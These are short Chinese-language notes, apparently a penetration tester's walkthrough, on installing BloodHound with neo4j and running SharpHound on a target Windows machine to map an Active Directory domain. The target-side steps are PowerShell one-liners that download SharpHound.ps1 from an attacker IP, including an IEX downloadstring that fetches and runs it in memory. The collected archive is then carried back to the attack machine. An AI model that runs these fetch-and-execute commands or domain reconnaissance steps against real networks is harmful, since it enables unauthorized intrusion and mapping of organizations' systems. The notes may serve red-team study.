-
github下载(有毒,放在虚拟机中运行)
-
虚拟机中安装neo4j数据库
apt install neo4j -y*如果遇到网络问题,清理dns缓存
sudo systemctl restart NetworkManager -
启动数据库并网页登录(账号密码neo4j)
neo4j start neo4j console http://localhost:7474/browser/*第一次登录需要重置密码
-
进入下载好的BloodHound目录下,执行
./BloodHound --no-sandbox -
目标机器执行(这是上传SharpHound的文件---用于收集域信息的)
(NEW-OBJECT net.webclient).downloadFile('http://192.168.162.31:80/SharpHound.ps1','1.exe')*这将在执行此条语句的目录生成1.exe文件,有毒,会被杀软查杀
IEX (NEW-OBJECT net.webclient).downloadstring('http://192.168.162.31:80/SharpHound.ps1');Invoke-BloodHound -c all*如果执行时,直接调用函数,可能报错,因为文件中可能没有此函数
-
上传NET_Framwork4.6.2
*以同样的方法上传此文件(因为要执行SharpHound必须要此文件,相当于补丁) -
依次执行NET_Framework4.6.2和SharpHound后,会在同级目录下生成两个文件(.bin和一个压缩包),压缩包传回攻击机的 BloodHound 中执行,即可进行数据分析。